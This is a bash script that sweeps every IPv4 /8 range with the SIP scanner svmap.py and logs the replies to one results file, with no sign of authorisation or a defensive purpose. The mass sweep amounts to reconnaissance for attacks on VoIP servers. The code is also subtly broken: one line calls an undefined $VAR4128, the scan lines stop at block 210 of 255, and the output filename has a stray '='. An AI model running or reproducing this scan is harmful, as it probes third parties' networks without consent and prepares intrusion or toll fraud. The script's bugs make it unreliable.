#!/bin/bash

# Scan IPv4 range on port sip

echo -e "\nStart scanning ...\n"

VAR1=1.0.0.0/8
VAR2=2.0.0.0/8
VAR3=3.0.0.0/8
VAR4=4.0.0.0/8
VAR5=5.0.0.0/8
VAR6=6.0.0.0/8
VAR7=7.0.0.0/8
VAR8=8.0.0.0/8
VAR9=9.0.0.0/8
VAR10=10.0.0.0/8
VAR11=11.0.0.0/8
VAR12=12.0.0.0/8
VAR13=13.0.0.0/8
VAR14=14.0.0.0/8
VAR15=15.0.0.0/8
VAR16=16.0.0.0/8
VAR17=17.0.0.0/8
VAR18=18.0.0.0/8
VAR19=19.0.0.0/8
VAR20=20.0.0.0/8
VAR21=21.0.0.0/8
VAR22=22.0.0.0/8
VAR23=23.0.0.0/8
VAR24=24.0.0.0/8
VAR25=25.0.0.0/8
VAR26=26.0.0.0/8
VAR27=27.0.0.0/8
VAR28=28.0.0.0/8
VAR29=29.0.0.0/8
VAR30=30.0.0.0/8
VAR31=31.0.0.0/8
VAR32=32.0.0.0/8
VAR33=33.0.0.0/8
VAR34=34.0.0.0/8
VAR35=35.0.0.0/8
VAR36=36.0.0.0/8
VAR37=37.0.0.0/8
VAR38=38.0.0.0/8
VAR39=39.0.0.0/8
VAR40=40.0.0.0/8
VAR41=41.0.0.0/8
VAR42=42.0.0.0/8
VAR43=43.0.0.0/8
VAR44=44.0.0.0/8
VAR45=45.0.0.0/8
VAR46=46.0.0.0/8
VAR47=47.0.0.0/8
VAR48=48.0.0.0/8
VAR49=49.0.0.0/8
VAR50=50.0.0.0/8
VAR51=51.0.0.0/8
VAR52=52.0.0.0/8
VAR53=53.0.0.0/8
VAR54=54.0.0.0/8
VAR55=55.0.0.0/8
VAR56=56.0.0.0/8
VAR57=57.0.0.0/8
VAR58=58.0.0.0/8
VAR59=59.0.0.0/8
VAR60=60.0.0.0/8
VAR61=61.0.0.0/8
VAR62=62.0.0.0/8
VAR63=63.0.0.0/8
VAR64=64.0.0.0/8
VAR65=65.0.0.0/8
VAR66=66.0.0.0/8
VAR67=67.0.0.0/8
VAR68=68.0.0.0/8
VAR69=69.0.0.0/8
VAR70=70.0.0.0/8
VAR71=71.0.0.0/8
VAR72=72.0.0.0/8
VAR73=73.0.0.0/8
VAR74=74.0.0.0/8
VAR75=75.0.0.0/8
VAR76=76.0.0.0/8
VAR77=77.0.0.0/8
VAR78=78.0.0.0/8
VAR79=79.0.0.0/8
VAR80=80.0.0.0/8
VAR81=81.0.0.0/8
VAR82=82.0.0.0/8
VAR83=83.0.0.0/8
VAR84=84.0.0.0/8
VAR85=85.0.0.0/8
VAR86=86.0.0.0/8
VAR87=87.0.0.0/8
VAR88=88.0.0.0/8
VAR89=89.0.0.0/8
VAR90=90.0.0.0/8
VAR91=91.0.0.0/8
VAR92=92.0.0.0/8
VAR93=93.0.0.0/8
VAR94=94.0.0.0/8
VAR95=95.0.0.0/8
VAR96=96.0.0.0/8
VAR97=97.0.0.0/8
VAR98=98.0.0.0/8
VAR99=99.0.0.0/8
VAR100=100.0.0.0/8
VAR101=101.0.0.0/8
VAR102=102.0.0.0/8
VAR103=103.0.0.0/8
VAR104=104.0.0.0/8
VAR105=105.0.0.0/8
VAR106=106.0.0.0/8
VAR107=107.0.0.0/8
VAR108=108.0.0.0/8
VAR109=109.0.0.0/8
VAR110=110.0.0.0/8
VAR111=111.0.0.0/8
VAR112=112.0.0.0/8
VAR113=113.0.0.0/8
VAR114=114.0.0.0/8
VAR115=115.0.0.0/8
VAR116=116.0.0.0/8
VAR117=117.0.0.0/8
VAR118=118.0.0.0/8
VAR119=119.0.0.0/8
VAR120=120.0.0.0/8
VAR121=121.0.0.0/8
VAR122=122.0.0.0/8
VAR123=123.0.0.0/8
VAR124=124.0.0.0/8
VAR125=125.0.0.0/8
VAR126=126.0.0.0/8
VAR127=127.0.0.0/8
VAR128=128.0.0.0/8
VAR129=129.0.0.0/8
VAR130=130.0.0.0/8
VAR131=131.0.0.0/8
VAR132=132.0.0.0/8
VAR133=133.0.0.0/8
VAR134=134.0.0.0/8
VAR135=135.0.0.0/8
VAR136=136.0.0.0/8
VAR137=137.0.0.0/8
VAR138=138.0.0.0/8
VAR139=139.0.0.0/8
VAR140=140.0.0.0/8
VAR141=141.0.0.0/8
VAR142=142.0.0.0/8
VAR143=143.0.0.0/8
VAR144=144.0.0.0/8
VAR145=145.0.0.0/8
VAR146=146.0.0.0/8
VAR147=147.0.0.0/8
VAR148=148.0.0.0/8
VAR149=149.0.0.0/8
VAR150=150.0.0.0/8
VAR151=151.0.0.0/8
VAR152=152.0.0.0/8
VAR153=153.0.0.0/8
VAR154=154.0.0.0/8
VAR155=155.0.0.0/8
VAR156=156.0.0.0/8
VAR157=157.0.0.0/8
VAR158=158.0.0.0/8
VAR159=159.0.0.0/8
VAR160=160.0.0.0/8
VAR161=161.0.0.0/8
VAR162=162.0.0.0/8
VAR163=163.0.0.0/8
VAR164=164.0.0.0/8
VAR165=165.0.0.0/8
VAR166=166.0.0.0/8
VAR167=167.0.0.0/8
VAR168=168.0.0.0/8
VAR169=169.0.0.0/8
VAR170=170.0.0.0/8
VAR171=171.0.0.0/8
VAR172=172.0.0.0/8
VAR173=173.0.0.0/8
VAR174=174.0.0.0/8
VAR175=175.0.0.0/8
VAR176=176.0.0.0/8
VAR177=177.0.0.0/8
VAR178=178.0.0.0/8
VAR179=179.0.0.0/8
VAR180=180.0.0.0/8
VAR181=181.0.0.0/8
VAR182=182.0.0.0/8
VAR183=183.0.0.0/8
VAR184=184.0.0.0/8
VAR185=185.0.0.0/8
VAR186=186.0.0.0/8
VAR187=187.0.0.0/8
VAR188=188.0.0.0/8
VAR189=189.0.0.0/8
VAR190=190.0.0.0/8
VAR191=191.0.0.0/8
VAR192=192.0.0.0/8
VAR193=193.0.0.0/8
VAR194=194.0.0.0/8
VAR195=195.0.0.0/8
VAR196=196.0.0.0/8
VAR197=197.0.0.0/8
VAR198=198.0.0.0/8
VAR199=199.0.0.0/8
VAR200=200.0.0.0/8
VAR201=201.0.0.0/8
VAR202=202.0.0.0/8
VAR203=203.0.0.0/8
VAR204=204.0.0.0/8
VAR205=205.0.0.0/8
VAR206=206.0.0.0/8
VAR207=207.0.0.0/8
VAR208=208.0.0.0/8
VAR209=209.0.0.0/8
VAR210=210.0.0.0/8
VAR211=211.0.0.0/8
VAR212=212.0.0.0/8
VAR213=213.0.0.0/8
VAR214=214.0.0.0/8
VAR215=215.0.0.0/8
VAR216=216.0.0.0/8
VAR217=217.0.0.0/8
VAR218=218.0.0.0/8
VAR219=219.0.0.0/8
VAR220=220.0.0.0/8
VAR221=221.0.0.0/8
VAR222=222.0.0.0/8
VAR223=223.0.0.0/8
VAR224=224.0.0.0/8
VAR225=225.0.0.0/8
VAR226=226.0.0.0/8
VAR227=227.0.0.0/8
VAR228=228.0.0.0/8
VAR229=229.0.0.0/8
VAR230=230.0.0.0/8
VAR231=231.0.0.0/8
VAR232=232.0.0.0/8
VAR233=233.0.0.0/8
VAR234=234.0.0.0/8
VAR235=235.0.0.0/8
VAR236=236.0.0.0/8
VAR237=237.0.0.0/8
VAR238=238.0.0.0/8
VAR239=239.0.0.0/8
VAR240=240.0.0.0/8
VAR241=241.0.0.0/8
VAR242=242.0.0.0/8
VAR243=243.0.0.0/8
VAR244=244.0.0.0/8
VAR245=245.0.0.0/8
VAR246=246.0.0.0/8
VAR247=247.0.0.0/8
VAR248=248.0.0.0/8
VAR249=249.0.0.0/8
VAR250=250.0.0.0/8
VAR251=251.0.0.0/8
VAR252=252.0.0.0/8
VAR253=253.0.0.0/8
VAR254=254.0.0.0/8
VAR255=255.0.0.0/8

         echo ----------------- $VAR1----------------
python svmap.py -t0.0 $VAR1 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR2----------------
python svmap.py -t0.0 $VAR2 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR3----------------
python svmap.py -t0.0 $VAR3 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR4----------------
python svmap.py -t0.0 $VAR4 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR5----------------
python svmap.py -t0.0 $VAR5 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR6----------------
python svmap.py -t0.0 $VAR6 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR7----------------
python svmap.py -t0.0 $VAR7 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR8----------------
python svmap.py -t0.0 $VAR8 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR9----------------
python svmap.py -t0.0 $VAR9 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR10----------------
python svmap.py -t0.0 $VAR10 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR11----------------
python svmap.py -t0.0 $VAR11 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR12----------------
python svmap.py -t0.0 $VAR12 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR13----------------
python svmap.py -t0.0 $VAR13 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR14----------------
python svmap.py -t0.0 $VAR14 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR15----------------
python svmap.py -t0.0 $VAR15 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR16----------------
python svmap.py -t0.0 $VAR16 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR17----------------
python svmap.py -t0.0 $VAR17 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR18----------------
python svmap.py -t0.0 $VAR18 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR19----------------
python svmap.py -t0.0 $VAR19 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR20----------------
python svmap.py -t0.0 $VAR20 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR21----------------
python svmap.py -t0.0 $VAR21 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR22----------------
python svmap.py -t0.0 $VAR22 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR23----------------
python svmap.py -t0.0 $VAR23 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR24----------------
python svmap.py -t0.0 $VAR24 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR25----------------
python svmap.py -t0.0 $VAR25 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR26----------------
python svmap.py -t0.0 $VAR26 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR27----------------
python svmap.py -t0.0 $VAR27 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR28----------------
python svmap.py -t0.0 $VAR28 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR29----------------
python svmap.py -t0.0 $VAR29 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR30----------------
python svmap.py -t0.0 $VAR30 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR31----------------
python svmap.py -t0.0 $VAR31 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR32----------------
python svmap.py -t0.0 $VAR32 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR33----------------
python svmap.py -t0.0 $VAR33 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR34----------------
python svmap.py -t0.0 $VAR34 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR35----------------
python svmap.py -t0.0 $VAR35 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR36----------------
python svmap.py -t0.0 $VAR36 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR37----------------
python svmap.py -t0.0 $VAR37 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR38----------------
python svmap.py -t0.0 $VAR38 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR39----------------
python svmap.py -t0.0 $VAR39 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR40----------------
python svmap.py -t0.0 $VAR40 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR41----------------
python svmap.py -t0.0 $VAR41 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR42----------------
python svmap.py -t0.0 $VAR42 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR43----------------
python svmap.py -t0.0 $VAR43 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR44----------------
python svmap.py -t0.0 $VAR44 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR45----------------
python svmap.py -t0.0 $VAR45 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR46----------------
python svmap.py -t0.0 $VAR46 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR47----------------
python svmap.py -t0.0 $VAR47 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR48----------------
python svmap.py -t0.0 $VAR48 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR49----------------
python svmap.py -t0.0 $VAR49 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR50----------------
python svmap.py -t0.0 $VAR50 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR51----------------
python svmap.py -t0.0 $VAR51 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR52----------------
python svmap.py -t0.0 $VAR52 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR53----------------
python svmap.py -t0.0 $VAR53 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR54----------------
python svmap.py -t0.0 $VAR54 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR55----------------
python svmap.py -t0.0 $VAR55 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR56----------------
python svmap.py -t0.0 $VAR56 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR57----------------
python svmap.py -t0.0 $VAR57 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR58----------------
python svmap.py -t0.0 $VAR58 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR59----------------
python svmap.py -t0.0 $VAR59 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR60----------------
python svmap.py -t0.0 $VAR60 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR61----------------
python svmap.py -t0.0 $VAR61 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR62----------------
python svmap.py -t0.0 $VAR62 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR63----------------
python svmap.py -t0.0 $VAR63 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR64----------------
python svmap.py -t0.0 $VAR64 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR65----------------
python svmap.py -t0.0 $VAR65 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR66----------------
python svmap.py -t0.0 $VAR66 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR67----------------
python svmap.py -t0.0 $VAR67 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR68----------------
python svmap.py -t0.0 $VAR68 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR69----------------
python svmap.py -t0.0 $VAR69 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR70----------------
python svmap.py -t0.0 $VAR70 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR71----------------
python svmap.py -t0.0 $VAR71 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR72----------------
python svmap.py -t0.0 $VAR72 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR73----------------
python svmap.py -t0.0 $VAR73 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR74----------------
python svmap.py -t0.0 $VAR74 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR75----------------
python svmap.py -t0.0 $VAR75 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR76----------------
python svmap.py -t0.0 $VAR76 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR77----------------
python svmap.py -t0.0 $VAR77 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR78----------------
python svmap.py -t0.0 $VAR78 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR79----------------
python svmap.py -t0.0 $VAR79 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR80----------------
python svmap.py -t0.0 $VAR80 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR81----------------
python svmap.py -t0.0 $VAR81 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR82----------------
python svmap.py -t0.0 $VAR82 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR83----------------
python svmap.py -t0.0 $VAR83 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR84----------------
python svmap.py -t0.0 $VAR84 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR85----------------
python svmap.py -t0.0 $VAR85 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR86----------------
python svmap.py -t0.0 $VAR86 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR87----------------
python svmap.py -t0.0 $VAR87 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR88----------------
python svmap.py -t0.0 $VAR88 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR89----------------
python svmap.py -t0.0 $VAR89 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR90----------------
python svmap.py -t0.0 $VAR90 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR91----------------
python svmap.py -t0.0 $VAR91 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR92----------------
python svmap.py -t0.0 $VAR92 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR93----------------
python svmap.py -t0.0 $VAR93 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR94----------------
python svmap.py -t0.0 $VAR94 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR95----------------
python svmap.py -t0.0 $VAR95 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR96----------------
python svmap.py -t0.0 $VAR96 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR97----------------
python svmap.py -t0.0 $VAR97 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR98----------------
python svmap.py -t0.0 $VAR98 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR99----------------
python svmap.py -t0.0 $VAR99 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR100----------------
python svmap.py -t0.0 $VAR100 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR101----------------
python svmap.py -t0.0 $VAR101 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR102----------------
python svmap.py -t0.0 $VAR102 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR103----------------
python svmap.py -t0.0 $VAR103 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR104----------------
python svmap.py -t0.0 $VAR104 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR105----------------
python svmap.py -t0.0 $VAR105 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR106----------------
python svmap.py -t0.0 $VAR106 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR107----------------
python svmap.py -t0.0 $VAR107 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR108----------------
python svmap.py -t0.0 $VAR108 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR109----------------
python svmap.py -t0.0 $VAR109 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR110----------------
python svmap.py -t0.0 $VAR110 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR111----------------
python svmap.py -t0.0 $VAR111 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR112----------------
python svmap.py -t0.0 $VAR112 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR113----------------
python svmap.py -t0.0 $VAR113 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR114----------------
python svmap.py -t0.0 $VAR114 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR115----------------
python svmap.py -t0.0 $VAR115 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR116----------------
python svmap.py -t0.0 $VAR116 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR117----------------
python svmap.py -t0.0 $VAR117 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR118----------------
python svmap.py -t0.0 $VAR118 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR119----------------
python svmap.py -t0.0 $VAR119 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR120----------------
python svmap.py -t0.0 $VAR120 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR121----------------
python svmap.py -t0.0 $VAR121 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR122----------------
python svmap.py -t0.0 $VAR122 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR123----------------
python svmap.py -t0.0 $VAR123 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR124----------------
python svmap.py -t0.0 $VAR124 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR125----------------
python svmap.py -t0.0 $VAR125 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR126----------------
python svmap.py -t0.0 $VAR126 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR127----------------
python svmap.py -t0.0 $VAR127 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR128----------------
python svmap.py -t0.0 $VAR4128 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR129----------------
python svmap.py -t0.0 $VAR129 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR130----------------
python svmap.py -t0.0 $VAR130 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR131----------------
python svmap.py -t0.0 $VAR131 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR132----------------
python svmap.py -t0.0 $VAR132 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR133----------------
python svmap.py -t0.0 $VAR133 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR134----------------
python svmap.py -t0.0 $VAR134 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR135----------------
python svmap.py -t0.0 $VAR135 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR136----------------
python svmap.py -t0.0 $VAR136 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR137----------------
python svmap.py -t0.0 $VAR137 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR138----------------
python svmap.py -t0.0 $VAR138 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR139----------------
python svmap.py -t0.0 $VAR139 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR140----------------
python svmap.py -t0.0 $VAR140 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR141----------------
python svmap.py -t0.0 $VAR141 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR142----------------
python svmap.py -t0.0 $VAR142 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR143----------------
python svmap.py -t0.0 $VAR143 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR144----------------
python svmap.py -t0.0 $VAR144 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR145----------------
python svmap.py -t0.0 $VAR145 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR146----------------
python svmap.py -t0.0 $VAR146 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR147----------------
python svmap.py -t0.0 $VAR147 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR148----------------
python svmap.py -t0.0 $VAR148 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR149----------------
python svmap.py -t0.0 $VAR149 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR150----------------
python svmap.py -t0.0 $VAR150 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR151----------------
python svmap.py -t0.0 $VAR151 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR152----------------
python svmap.py -t0.0 $VAR152 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR153----------------
python svmap.py -t0.0 $VAR153 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR154----------------
python svmap.py -t0.0 $VAR154 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR155----------------
python svmap.py -t0.0 $VAR155 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR156----------------
python svmap.py -t0.0 $VAR156 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR157----------------
python svmap.py -t0.0 $VAR157 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR158----------------
python svmap.py -t0.0 $VAR158 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR159----------------
python svmap.py -t0.0 $VAR159 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR160----------------
python svmap.py -t0.0 $VAR160 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR161----------------
python svmap.py -t0.0 $VAR161 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR162----------------
python svmap.py -t0.0 $VAR162 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR163----------------
python svmap.py -t0.0 $VAR163 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR164----------------
python svmap.py -t0.0 $VAR164 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR165----------------
python svmap.py -t0.0 $VAR165 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR166----------------
python svmap.py -t0.0 $VAR166 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR167----------------
python svmap.py -t0.0 $VAR167 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR168----------------
python svmap.py -t0.0 $VAR168 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR169----------------
python svmap.py -t0.0 $VAR169 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR170----------------
python svmap.py -t0.0 $VAR170 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR171----------------
python svmap.py -t0.0 $VAR171 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR172----------------
python svmap.py -t0.0 $VAR172 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR173----------------
python svmap.py -t0.0 $VAR173 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR174----------------
python svmap.py -t0.0 $VAR174 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR175----------------
python svmap.py -t0.0 $VAR175 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR176----------------
python svmap.py -t0.0 $VAR176 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR177----------------
python svmap.py -t0.0 $VAR177 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR178----------------
python svmap.py -t0.0 $VAR178 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR179----------------
python svmap.py -t0.0 $VAR179 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR180----------------
python svmap.py -t0.0 $VAR180 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR181----------------
python svmap.py -t0.0 $VAR181 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR182----------------
python svmap.py -t0.0 $VAR182 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR183----------------
python svmap.py -t0.0 $VAR183 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR184----------------
python svmap.py -t0.0 $VAR184 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR185----------------
python svmap.py -t0.0 $VAR185 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR186----------------
python svmap.py -t0.0 $VAR186 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR187----------------
python svmap.py -t0.0 $VAR187 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR188----------------
python svmap.py -t0.0 $VAR188 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR189----------------
python svmap.py -t0.0 $VAR189 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR190----------------
python svmap.py -t0.0 $VAR190 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR191----------------
python svmap.py -t0.0 $VAR191 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR192----------------
python svmap.py -t0.0 $VAR192 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR193----------------
python svmap.py -t0.0 $VAR193 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR194----------------
python svmap.py -t0.0 $VAR194 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR195----------------
python svmap.py -t0.0 $VAR195 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR196----------------
python svmap.py -t0.0 $VAR196 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR197----------------
python svmap.py -t0.0 $VAR197 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR198----------------
python svmap.py -t0.0 $VAR198 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR199----------------
python svmap.py -t0.0 $VAR199 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR200----------------
python svmap.py -t0.0 $VAR200 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR201----------------
python svmap.py -t0.0 $VAR201 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR202----------------
python svmap.py -t0.0 $VAR202 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR203----------------
python svmap.py -t0.0 $VAR203 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR204----------------
python svmap.py -t0.0 $VAR204 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR205----------------
python svmap.py -t0.0 $VAR205 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR206----------------
python svmap.py -t0.0 $VAR206 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR207----------------
python svmap.py -t0.0 $VAR207 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR208----------------
python svmap.py -t0.0 $VAR208 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR209----------------
python svmap.py -t0.0 $VAR209 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR210----------------
python svmap.py -t0.0 $VAR210 -m  -v >> =Allworldresult.txt

